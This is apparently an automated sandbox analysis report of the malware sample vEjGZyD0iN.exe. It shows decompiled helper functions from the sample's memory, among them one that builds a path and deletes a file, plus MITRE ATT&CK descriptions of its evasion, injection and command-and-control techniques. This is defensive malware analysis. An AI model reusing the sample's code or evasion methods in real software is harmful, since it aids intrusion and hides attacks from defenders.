VirtualFree.KERNEL32(?,00000000,00008000,?,000DBBA0,?,00988F3E), ref: 009888EB
CloseHandle.KERNEL32(?,?,000DBBA0,?,00988F3E), ref: 009888F4
GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,00988F3E), ref: 00988901
HeapFree.KERNEL32(00000000,?,000DBBA0,?,00988F3E), ref: 00988908

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: FreeHeap$CloseHandleObjectProcessSingleVirtualWait
String ID:
API String ID: 797926041-0
Opcode ID: 7fa39cd91a3b833c4a759de124c234592b83daa1af74f2266a0447a56673991d
Instruction ID: 1167af39607d4b402762f50481a292584e0b090d06de662d8024cf2828efc645
Opcode Fuzzy Hash: 7fa39cd91a3b833c4a759de124c234592b83daa1af74f2266a0447a56673991d
Instruction Fuzzy Hash: F9F08C71618210ABEB306BA4DC8CB1677A9EF04711F200824F592E73A1C771AC40ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 00981E50, Relevance: 6.1, APIs: 4, Instructions: 89
memoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E00981E50(void* __ecx, void** __edx, long* _a4) {
				long _v8;
				long _v12;
				long _v16;
				void** _v20;
				long _t36;
				void* _t42;
				long _t46;
				void* _t49;
				void* _t52;
				void* _t53;

				_push(0);
				_v20 = __edx;
				_push( &_v8);
				_v8 = 4;
				_t42 = __ecx;
				_push( &_v16);
				_push(0x20000005);
				_push( *((intOrPtr*)(__ecx + 8)));
				if( *0x98c238() == 0) {
					return 0;
				} else {
					_t49 = RtlAllocateHeap(GetProcessHeap(), 0, _v16);
					if(_t49 == 0) {
						return 0;
					} else {
						_v8 = 0;
						_v12 = 0;
						_t53 =  *0x98c248( *((intOrPtr*)(_t42 + 8)), _t49, _v16,  &_v12, _t52);
						if(_t53 == 0) {
							L7:
							HeapFree(GetProcessHeap(), 0, _t49);
							if(_t53 != 0) {
								goto L8;
							}
						} else {
							while(1) {
								_t36 = _v12;
								if(_t36 == 0) {
									break;
								}
								_t46 = _v8 + _t36;
								_v8 = _t46;
								_t53 =  *0x98c248( *((intOrPtr*)(_t42 + 8)), _t49 + _t46, _v16 - _t46,  &_v12);
								if(_t53 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L9;
							}
							if(_t53 != 0) {
								L8:
								 *_v20 = _t49;
								 *_a4 = _v8;
							} else {
								goto L7;
							}
						}
						L9:
						return _t53;
					}
				}
			}

0x00981e57
0x00981e5c
0x00981e5f
0x00981e63
0x00981e6a
0x00981e6c
0x00981e6d
0x00981e72
0x00981e7d
0x00981f30
0x00981e83
0x00981e96
0x00981e9a
0x00981f29
0x00981ea0
0x00981ea4
0x00981eaf
0x00981ec0
0x00981ec4
0x00981ef8
0x00981f02
0x00981f0a
0x00000000
0x00000000
0x00981ec6
0x00981ec6
0x00981ec6
0x00981ecb
0x00000000
0x00000000
0x00981ed0
0x00981edb
0x00981eec
0x00981ef0
0x00000000
0x00981ef2
0x00000000
0x00981ef2
0x00000000
0x00981ef0
0x00981ef6
0x00981f0c
0x00981f12
0x00981f17
0x00000000
0x00000000
0x00000000
0x00981ef6
0x00981f19
0x00981f21
0x00981f21
0x00981e9a

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,?,00988631), ref: 00981E89
RtlAllocateHeap.NTDLL(00000000), ref: 00981E90
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00981EFB
HeapFree.KERNEL32(00000000), ref: 00981F02

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFree
String ID:
API String ID: 576844849-0
Opcode ID: 88b8adbeb2d5e9fb9911648e88642f75bde5f2fe1380fdcd52574ea3a442a6b7
Instruction ID: 3359248bb7cff6f45b52fb38a4239aa2a5f358970de4bab248d98aa5bba2aad2
Opcode Fuzzy Hash: 88b8adbeb2d5e9fb9911648e88642f75bde5f2fe1380fdcd52574ea3a442a6b7
Instruction Fuzzy Hash: FC212BB6A04208AFDB119F98DC88FAEBBBCEB48711F1401A5ED05E7351D7319E11DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00988420, Relevance: 6.1, APIs: 4, Instructions: 63
memoryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00988420(intOrPtr __ecx, signed int __edx, long* _a4) {
				intOrPtr _v8;
				void* _t20;
				signed int _t28;
				signed int _t36;
				long _t44;
				void* _t45;

				_t36 = __edx;
				_t26 = _a4;
				_v8 = __ecx;
				_t28 = __edx * 0x6e;
				_t44 =  >  ? (0x51eb851f * _t28 >> 0x20 >> 5) - 0xffffff80 : ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) + 0x85 + __edx + ((__edx - (0x8421085 * __edx >> 0x20) >> 1) + (0x8421085 * __edx >> 0x20) >> 0xe) * 4;
				 *_a4 = _t44;
				_t20 = RtlAllocateHeap(GetProcessHeap(), 0, _t44);
				_t45 = _t20;
				if(_t45 == 0) {
					return _t20;
				} else {
					_push(_t28);
					if(E009829B0(_t45, _t26, _v8, _t36) == 0) {
						return _t45;
					}
					HeapFree(GetProcessHeap(), 0, _t45);
					return 0;
				}
			}

0x00988429
0x0098842b
0x00988433
0x00988438
0x00988460
0x00988466
0x0098846f
0x00988475
0x00988479
0x009884b1
0x0098847b
0x0098847b
0x0098848e
0x00000000
0x009884a9
0x0098849a
0x009884a8
0x009884a8

APIs

GetProcessHeap.KERNEL32(00000000,?,?,000DBBA0,?,000DBBA0), ref: 00988468
RtlAllocateHeap.NTDLL(00000000,?,000DBBA0), ref: 0098846F

Part of subcall function 009829B0: memset.NTDLL ref: 009829C4

GetProcessHeap.KERNEL32(00000000,00000000,?,000DBBA0,?,000DBBA0), ref: 00988493
HeapFree.KERNEL32(00000000,?,000DBBA0,?,000DBBA0), ref: 0098849A

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: 3d73f96d3e6e617c3d30e5918ef6ba3a77f1bf337556445885af97f8db4aa183
Instruction ID: a22ef5a6da24c1b7ad1d85048c33a85ee86bc82fb9c007b6c5c7fc3918c21232
Opcode Fuzzy Hash: 3d73f96d3e6e617c3d30e5918ef6ba3a77f1bf337556445885af97f8db4aa183
Instruction Fuzzy Hash: 7601C473F085246BD7249BB9AC4DA5EBBA9DBC8661F414271FD0CD7395EA318C1083E1

Uniqueness

Uniqueness Score: -1.00%

Function 00988B30, Relevance: 6.0, APIs: 4, Instructions: 46
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00988B30(WCHAR* _a4, intOrPtr* _a8) {
				intOrPtr* _t14;
				intOrPtr* _t19;
				intOrPtr _t24;
				WCHAR* _t25;
				intOrPtr* _t26;

				_t25 = _a4;
				_t10 = _t25 + 0x24;
				_a4 = _t25 + 0x24;
				_t24 = E009819E0(_t10);
				if( *((intOrPtr*)(_t25 + 0x18)) == GetCurrentProcessId()) {
					L8:
					return 1;
				}
				_t19 = _a8;
				_t14 =  *_t19;
				if(_t14 == 0) {
					L5:
					_t26 = RtlAllocateHeap(GetProcessHeap(), 8, 0x210);
					if(_t26 != 0) {
						_t8 = _t26 + 4; // 0x4
						lstrcpyW(_t8, _a4);
						 *((intOrPtr*)(_t26 + 0x20c)) = _t24;
						 *_t26 =  *_t19;
						 *_t19 = _t26;
					}
					L7:
					goto L8;
				}
				while( *((intOrPtr*)(_t14 + 0x20c)) != _t24) {
					_t14 =  *_t14;
					if(_t14 != 0) {
						continue;
					}
					goto L5;
				}
				goto L7;
			}

0x00988b34
0x00988b38
0x00988b3d
0x00988b45
0x00988b50
0x00988ba3
0x00988baa
0x00988baa
0x00988b53
0x00988b56
0x00988b5a
0x00988b6e
0x00988b82
0x00988b86
0x00988b8b
0x00988b8f
0x00988b95
0x00988b9d
0x00988b9f
0x00988b9f
0x00988ba1
0x00000000
0x00988ba1
0x00988b60
0x00988b68
0x00988b6c
0x00000000
0x00000000
0x00000000
0x00988b6c
0x00000000

APIs

GetCurrentProcessId.KERNEL32(00000000,00000000,?,0098215D,0000022C,00000000,?,?), ref: 00988B47
GetProcessHeap.KERNEL32(00000008,00000210,00000000,?,0098215D,0000022C,00000000,?,?), ref: 00988B75
RtlAllocateHeap.NTDLL(00000000,?,0098215D), ref: 00988B7C
lstrcpyW.KERNEL32(00000004,?), ref: 00988B8F

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: HeapProcess$AllocateCurrentlstrcpy
String ID:
API String ID: 2952365268-0
Opcode ID: 146dc5a3c5711064d4e105b8304e4b487d0443dd648368e4889fc3e46444d4f3
Instruction ID: b420188102398b4eb7ecd8874b5554cf59d13e32ef21241c9fa941f48d82711b
Opcode Fuzzy Hash: 146dc5a3c5711064d4e105b8304e4b487d0443dd648368e4889fc3e46444d4f3
Instruction Fuzzy Hash: 16019EB1604304AFCB209F69D888E86B7E8FF84740F548529F945D7351DB30E840CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 009884C0, Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E009884C0(intOrPtr __ecx, void* __edx, long* _a4) {
				intOrPtr _v8;
				void* _t5;
				void* _t11;
				void* _t17;

				_t16 = _a4;
				_t11 = __edx;
				_v8 = __ecx;
				_t5 = RtlAllocateHeap(GetProcessHeap(), 0,  *_a4);
				_t17 = _t5;
				if(_t17 == 0) {
					return _t5;
				} else {
					if(E00982D80(_t17, _t16, _v8, _t11) == 0) {
						return _t17;
					}
					HeapFree(GetProcessHeap(), 0, _t17);
					return 0;
				}
			}

0x009884c9
0x009884cc
0x009884ce
0x009884dc
0x009884e2
0x009884e6
0x0098851d
0x009884e8
0x009884fa
0x00000000
0x00988515
0x00988506
0x00988514
0x00988514

APIs

GetProcessHeap.KERNEL32(00000000,00988668,?,?,?,00988668,?), ref: 009884D5
RtlAllocateHeap.NTDLL(00000000), ref: 009884DC

Part of subcall function 00982D80: memset.NTDLL ref: 00982D94

GetProcessHeap.KERNEL32(00000000,00000000), ref: 009884FF
HeapFree.KERNEL32(00000000), ref: 00988506

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateFreememset
String ID:
API String ID: 1319286391-0
Opcode ID: 9fe872f266de2758815d9c0af1eb6a869159f205fbddf337b1ca516eb5dd5c69
Instruction ID: 3ca2cea4a0174040dbad2cd4e1c8d49bb575a76a5cc44dea042041610f35fb00
Opcode Fuzzy Hash: 9fe872f266de2758815d9c0af1eb6a869159f205fbddf337b1ca516eb5dd5c69
Instruction Fuzzy Hash: E5F09676B081146BDA1067A97C4DA5EFB9CDF84763F040062FD08D2351E9319D1057F1

Uniqueness

Uniqueness Score: -1.00%

Function 0098A750, Relevance: 6.0, APIs: 4, Instructions: 31
memorysynchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0098A750(long __ecx) {
				int _t3;
				long _t7;
				void* _t9;
				void* _t10;

				_t10 =  *0x98cbd4; // 0x0
				_t7 = __ecx;
				_t9 = 0x98cbd4;
				while(_t10 != 0) {
					_t3 = WaitForSingleObject( *(_t10 + 8), _t7);
					if(_t3 == 0x102) {
						_t9 = _t10;
					} else {
						 *_t9 =  *_t10;
						CloseHandle( *(_t10 + 8));
						_t3 = HeapFree(GetProcessHeap(), 0, _t10);
					}
					_t10 =  *_t9;
				}
				return _t3;
			}

0x0098a752
0x0098a758
0x0098a75b
0x0098a762
0x0098a768
0x0098a773
0x0098a794
0x0098a775
0x0098a777
0x0098a77c
0x0098a78c
0x0098a78c
0x0098a796
0x0098a798
0x0098a79f

APIs

WaitForSingleObject.KERNEL32(?,?,00000000,00989315,00000000,0098928E), ref: 0098A768
CloseHandle.KERNEL32(?,?,00000000,00989315,00000000,0098928E), ref: 0098A77C
GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00989315,00000000,0098928E), ref: 0098A785
HeapFree.KERNEL32(00000000,?,00000000,00989315,00000000,0098928E), ref: 0098A78C

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$CloseFreeHandleObjectProcessSingleWait
String ID:
API String ID: 1931067520-0
Opcode ID: 17818c3a188282c00493521597843ce683119c14e841e891acd392a6a91c010c
Instruction ID: 5921270ce25676fd2464f7eab677381c4602d42eb7af1890ac632e77a4e30610
Opcode Fuzzy Hash: 17818c3a188282c00493521597843ce683119c14e841e891acd392a6a91c010c
Instruction Fuzzy Hash: B1F0E5B2918220AFFB212B59EC8CA267BBDEF44721B180416FA45D3321C3749C40EBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00981970, Relevance: 6.0, APIs: 4, Instructions: 31
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00981970() {
				void* _v8;
				short _v528;
				void* _t15;

				E00981830(0x981010, 0x14, 0x41ce18c7,  &_v8);
				_t15 = _v8;
				 *0x98c200( &_v528, 0x104, _t15, 0x98c7c0, _t15);
				HeapFree(GetProcessHeap(), 0, _t15);
				return DeleteFileW( &_v528);
			}

0x0098198d
0x00981992
0x009819a8
0x009819bb
0x009819d2

APIs

Part of subcall function 00981830: GetProcessHeap.KERNEL32(00000008,00989F6B,00000000,00000000,00981004,?,009815F4,4DBAC13F,00989F6B,?,00000000), ref: 00981844
Part of subcall function 00981830: RtlAllocateHeap.NTDLL(00000000,?,009815F4), ref: 0098184B

_snwprintf.NTDLL ref: 009819A8
GetProcessHeap.KERNEL32(00000000,00989730), ref: 009819B4
HeapFree.KERNEL32(00000000), ref: 009819BB
DeleteFileW.KERNEL32(?), ref: 009819C8

Memory Dump Source

Source File: 00000001.00000002.327566145.0000000000981000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000001.00000002.327562401.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327573949.000000000098B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.327578195.000000000098C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.327581634.000000000098D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_980000_vEjGZyD0iN.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateDeleteFileFree_snwprintf
String ID:
API String ID: 135842935-0
Opcode ID: 9baf407435b7e234ee89f1db3909105198c5ca8833c29e0d6345e6a120191790
Instruction ID: c3e37eaca75e224e76c424d823ac4cad43debfae44deade6585356bb41d6991d
Opcode Fuzzy Hash: 9baf407435b7e234ee89f1db3909105198c5ca8833c29e0d6345e6a120191790
Instruction Fuzzy Hash: DEF0A7F1915218B7DB10BBA4AC4DFCB7B6CEB45315F100091B909E2243D6305A059BF1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report vEjGZyD0iN.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Function 009815B0, Relevance: 40.4, APIs: 21, Strings: 2, Instructions: 133
memorysynchronizationprocessCOMMON

Function 00981599, Relevance: 15.1, APIs: 10, Instructions: 86
memorysynchronizationCOMMON

Function 00981575, Relevance: 13.6, APIs: 9, Instructions: 73
memorysynchronizationCOMMON

Function 00989EE0, Relevance: 9.0, APIs: 6, Instructions: 40
memoryCOMMON

Function 00981F40, Relevance: 9.2, APIs: 6, Instructions: 163
librarymemoryloaderCOMMON

Function 00982110, Relevance: 6.0, APIs: 4, Instructions: 39
processCOMMON

Function 00986E70, Relevance: 4.2, APIs: 3, Instructions: 428
COMMONCrypto

Function 009877F0, Relevance: .6, Instructions: 581
COMMONCrypto

Function 0098A3A0, Relevance: 49.2, APIs: 27, Strings: 1, Instructions: 225
memoryfileprocessCOMMON

Function 00989320, Relevance: 39.2, APIs: 26, Instructions: 246
memoryfilestringCOMMON

Function 00989620, Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 284
stringCOMMON

Function 00989C50, Relevance: 36.2, APIs: 24, Instructions: 185
memorylibraryCOMMON

Function 00989060, Relevance: 34.7, APIs: 23, Instructions: 160
memorysynchronizationtimeCOMMON

Function 00989A90, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 139
memoryfilesleepCOMMON

Function 00988520, Relevance: 22.7, APIs: 15, Instructions: 152
memoryCOMMON

Function 00988DD0, Relevance: 21.2, APIs: 14, Instructions: 155
memorystringCOMMON

Function 00988BB0, Relevance: 21.2, APIs: 14, Instructions: 154
memorystringCOMMON

Function 0098A690, Relevance: 15.1, APIs: 10, Instructions: 65
memorythreadCOMMON

Function 00981C50, Relevance: 10.6, APIs: 7, Instructions: 97
memoryCOMMON

Function 00989F80, Relevance: 9.2, APIs: 6, Instructions: 199
memoryCOMMON

Function 00988990, Relevance: 9.1, APIs: 6, Instructions: 95
memorythreadCOMMON

Function 00982180, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80
memoryprocessCOMMON

Function 009818D0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
COMMON

Function 00988290, Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 91
COMMON

Function 00988AA0, Relevance: 7.5, APIs: 5, Instructions: 49
memorysynchronizationCOMMON

Function 009888B0, Relevance: 7.5, APIs: 5, Instructions: 40
memorysynchronizationCOMMON